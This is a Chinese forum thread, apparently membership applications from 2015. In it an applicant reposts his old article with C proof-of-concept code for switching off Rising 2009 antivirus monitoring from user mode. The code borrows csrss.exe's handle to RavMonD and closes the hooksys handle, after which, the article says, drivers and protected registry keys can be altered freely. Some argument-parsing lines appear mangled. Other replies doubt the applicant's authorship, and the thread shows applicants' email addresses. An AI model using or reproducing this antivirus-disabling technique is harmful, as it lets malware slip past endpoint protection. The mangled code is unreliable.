申请会员ID: hopy
申 请 I D:hopy个人邮箱:19796174@qq.com
原创技术文章:http://blog.csdn.net/mydo
上次申请过,貌似不给过,非要贴下面的图吗?
即使是大牛也请看好申请规则,既来之则安之,入乡随俗,先了解我们的申请规则和格式。 本帖最后由 Ssking 于 2015-4-16 17:35 编辑
直接在看雪发个贴子直接秒掉 Hmily 发表于 2015-4-16 12:20
即使是大牛也请看好申请规则,既来之则安之,入乡随俗,先了解我们的申请规则和格式。
我个人认为,看雪这种类型的大神如此嚣张么,这直接上各种精华贴图,好嚣张
让他直接看雪发帖不就完了。 好吧,入乡随俗.
代码一定要贴在帖子里面?给链接可以吗?
早期写的一篇文章:
用户层关闭瑞星2009杀毒软件安全保护
我写这个纯粹是hacker精神,如果被滥用做病毒木马一类的邋遢东东,可跟偶没关系哦。
原理very简单,我发现瑞星监控主要在RavMonD进程中,如果打破其与内核的联系,则
瑞星监控功能就无法正常工作了,怎么打破联系呢?如果是进内核的话当然有很多的办法,
从而没有挑战性了,况且RavMonD会阻止用户进程去加载驱动或者动注册表的关键地方,
比如run子键。下面上测试代码:
int main(int argc,char *argv[])
{
if(argc != 4)
puts("usage ccon csrss.pid prmd.handle hooksys.handle");
else
{
int pid = atoi(argv);
int hprmd = atoi(argv);
int hobj = atoi(argv);
if(!SetDebugPrivilege(true))
puts("SetDebugPrivilege Failed!");
HANDLE hcs = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
if(!hcs)
{
puts("Open Csrss.exe Failed");
PrintErr(GetLastError());
}
else //直接打开RavMonD进程会失败的,so采用迂回战术
{
HANDLE hprmd_loc;
if(!DuplicateHandle(hcs,(HANDLE)hprmd,GetCurrentProcess(),/
&hprmd_loc,PROCESS_ALL_ACCESS,false,0))
{
puts("Get hprmd_loc Failed!");
PrintErr(GetLastError());
}
else //关闭hooksys的句柄,打破其与内核的联系
{
HANDLE hobj_loc;
if(!DuplicateHandle(hprmd_loc,(HANDLE)hobj,/
GetCurrentProcess(),&hobj_loc,0,false,/
DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS))
{
puts("Get hobj_loc Failed!");
PrintErr(GetLastError());
}
else
{
if(!CloseHandle(hobj_loc))
{
puts("Close hobj_loc Failed");
}
else
puts("We Success Finally!!!");
}
}
}
}
return 0;
}
打破瑞星监控与内核的关联之后,用户进程可以任意加载驱动程序进内核或者篡改注册表
中的关键内容,我测试了一下,虽然第一次修改注册表中的监控内容时瑞星还是会提示用
户是否允许修改,但是这时即使选择否,同样可以修改成功,而且以后的修改瑞星不会再
提示了。
其实防守起来也很容易,瑞星只要不让我们在ring3下取到hooksys的句柄就行了,当然
仍然防不住内核中的攻击,进入ring0还是可以为所欲为。
我的测试环境 windows xp sp3 + 瑞星杀毒2009 21.49.14 测试成功
游客 61.190.26.x 发表于 2015-4-19 10:26
早期写的一篇文章:
用户层关闭瑞星2009杀毒软件安全保护
根本不行,写个首发行不?
谁知道你是不是原创HOPY 啊,而且看雪的HOPY的QQ也不是你的这个,疑点好多,你发个首发不就得了 申请名:kuge
邮箱:ku_main@163.com
没文章{:1_909:} QQ_B840B3 发表于 2015-4-20 11:10
申请名:kuge
邮箱:
没文章只能等开放
页:
[1]